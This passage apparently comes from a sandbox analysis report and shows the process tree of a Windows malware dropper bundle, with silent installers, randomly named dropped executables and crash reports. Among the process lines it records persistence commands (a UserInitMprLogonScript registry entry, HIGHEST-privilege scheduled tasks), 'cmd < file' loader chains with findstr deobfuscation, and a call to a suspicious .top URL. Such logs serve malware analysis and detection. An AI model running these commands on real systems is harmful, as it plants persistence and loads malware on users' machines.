                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5948 /prefetch:8
                                                                              9⤵
                                                                                PID:1296
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
                                                                                9⤵
                                                                                  PID:4036
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
                                                                                  9⤵
                                                                                    PID:3416
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                                                                                    9⤵
                                                                                      PID:3660
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
                                                                                      9⤵
                                                                                        PID:4896
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
                                                                                        9⤵
                                                                                          PID:4664
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
                                                                                          9⤵
                                                                                            PID:4004
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:8
                                                                                            9⤵
                                                                                              PID:5708
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
                                                                                              9⤵
                                                                                                PID:3460
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
                                                                                                9⤵
                                                                                                  PID:5532
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1
                                                                                                  9⤵
                                                                                                    PID:3184
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:1080
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1880 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:3292
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2376 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:4628
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=3828 /prefetch:8
                                                                                                          9⤵
                                                                                                            PID:1584
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                                                                            9⤵
                                                                                                              PID:3032
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2260,6530113162718497070,11488300270041248805,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
                                                                                                              9⤵
                                                                                                                PID:1548
                                                                                                            • C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe
                                                                                                              "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:6008
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Mortician.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Mortician.exe"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1488
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "cmd" /c cmd < Cerchia.vsdx
                                                                                                                  10⤵
                                                                                                                    PID:1468
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd
                                                                                                                      11⤵
                                                                                                                        PID:2244
                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                          findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
                                                                                                                          12⤵
                                                                                                                            PID:3404
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                            Impedire.exe.com I
                                                                                                                            12⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5012
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                              C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                              13⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1368
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                14⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4276
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                  15⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2348
                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                            ping localhost
                                                                                                                            12⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:5020
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                                                                                      9⤵
                                                                                                                        PID:2960
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 300
                                                                                                                          10⤵
                                                                                                                          • Program crash
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:2216
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wrap 1.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4828
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Modifies registry class
                                                                                                                        PID:5308
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                                                                                          10⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4448
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4912
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:2960
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                        9⤵
                                                                                                                          PID:436
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DO1KB.tmp\IBInstaller_74449.tmp
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DO1KB.tmp\IBInstaller_74449.tmp" /SL5="$700C4,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                            10⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:4884
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-9USH6.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                              11⤵
                                                                                                                                PID:880
                                                                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-9USH6.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                  12⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:3632
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                11⤵
                                                                                                                                  PID:5516
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                                                    12⤵
                                                                                                                                      PID:6004
                                                                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                                    11⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:3028
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                                                    11⤵
                                                                                                                                      PID:3276
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449&param=721
                                                                                                                                        12⤵
                                                                                                                                          PID:2184
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff860c146f8,0x7ff860c14708,0x7ff860c14718
                                                                                                                                            13⤵
                                                                                                                                              PID:5524
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-9USH6.tmp\{app}\vdi_compiler.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-9USH6.tmp\{app}\vdi_compiler"
                                                                                                                                          11⤵
                                                                                                                                            PID:1280
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 292
                                                                                                                                              12⤵
                                                                                                                                              • Program crash
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:3952
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vpn.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                                        9⤵
                                                                                                                                          PID:1688
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4AR6D.tmp\vpn.tmp
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4AR6D.tmp\vpn.tmp" /SL5="$60038,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vpn.exe" /silent /subid=720
                                                                                                                                            10⤵
                                                                                                                                              PID:4700
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                11⤵
                                                                                                                                                  PID:5592
                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                    tapinstall.exe remove tap0901
                                                                                                                                                    12⤵
                                                                                                                                                      PID:1556
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                    11⤵
                                                                                                                                                      PID:1400
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                        tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                        12⤵
                                                                                                                                                          PID:1088
                                                                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                        11⤵
                                                                                                                                                          PID:4200
                                                                                                                                                        • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                          "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                          11⤵
                                                                                                                                                            PID:4956
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                        9⤵
                                                                                                                                                          PID:2876
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Cleaner_Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631048163 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:2440
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\askinstall45.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\askinstall45.exe"
                                                                                                                                                            9⤵
                                                                                                                                                              PID:3792
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 1684
                                                                                                                                                                10⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:5928
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\028d53f5224f9cc8c60bd953504f1efa.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:1528
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 300
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:5664
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Cleanpro12.exe"
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:5212
                                                                                                                                                                  • C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:5084
                                                                                                                                                                      • C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:4164
                                                                                                                                                                        • C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\uNe6vxbeHiqEGfmrTlcazPr1.exe"
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:1172
                                                                                                                                                                        • C:\Users\Admin\Documents\fSuJcAiF0HmZEIJXlB3EYkjN.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\fSuJcAiF0HmZEIJXlB3EYkjN.exe"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:4716
                                                                                                                                                                            • C:\Users\Admin\Documents\fSuJcAiF0HmZEIJXlB3EYkjN.exe
                                                                                                                                                                              C:\Users\Admin\Documents\fSuJcAiF0HmZEIJXlB3EYkjN.exe
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:2224
                                                                                                                                                                            • C:\Users\Admin\Documents\Cnasy7WZkZszmXALjTo0cOml.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\Cnasy7WZkZszmXALjTo0cOml.exe"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:3796
                                                                                                                                                                              • C:\Users\Admin\Documents\xUCGtfoUHQ0JnXrtGsc5sgvW.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\xUCGtfoUHQ0JnXrtGsc5sgvW.exe"
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:4136
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd /c cmd < Nobile.docm
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:5976
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:1436
                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                            findstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm
                                                                                                                                                                                            13⤵
                                                                                                                                                                                              PID:5844
                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                              ping localhost
                                                                                                                                                                                              13⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:1524
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                              Rimasta.exe.com J
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:1980
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:2592
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                        PID:2044
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                  dllhost.exe
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:584
                                                                                                                                                                                                • C:\Users\Admin\Documents\VG4lHaJJD3T6W2Fk9rOBVA2g.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\VG4lHaJJD3T6W2Fk9rOBVA2g.exe"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:4328
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:4040
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:3320
                                                                                                                                                                                                  • C:\Users\Admin\Documents\dO7w1BCb2EIh4G9JNsKNU9B_.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\dO7w1BCb2EIh4G9JNsKNU9B_.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:1644
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 240
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:3948
                                                                                                                                                                                                    • C:\Users\Admin\Documents\JZGQLcTeJsuZ8p4hE1jBeUvf.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\JZGQLcTeJsuZ8p4hE1jBeUvf.exe"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:1300
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 264
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:1488
                                                                                                                                                                                                      • C:\Users\Admin\Documents\IpQ4ham28cY4McFBZtj8Y6aH.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\IpQ4ham28cY4McFBZtj8Y6aH.exe"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:4148
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 244
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:2664
                                                                                                                                                                                                        • C:\Users\Admin\Documents\GqATUc6_y0Vu5HxOxZajdVLb.exe
                                                                                                                                                                                                          "C:\Users\Admin\Documents\GqATUc6_y0Vu5HxOxZajdVLb.exe"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                          • C:\Users\Admin\Documents\DHS8o4zcaBo_BSQju8pSqUSW.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\DHS8o4zcaBo_BSQju8pSqUSW.exe"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:4600
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 284
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                            • C:\Users\Admin\Documents\e1hqEDHOhsNFhVY1YuI3Kyzy.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\e1hqEDHOhsNFhVY1YuI3Kyzy.exe"
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:2780
                                                                                                                                                                                                              • C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\zfDDj_YoaPcYIx61Slp4L_SJ.exe"
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:2196
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
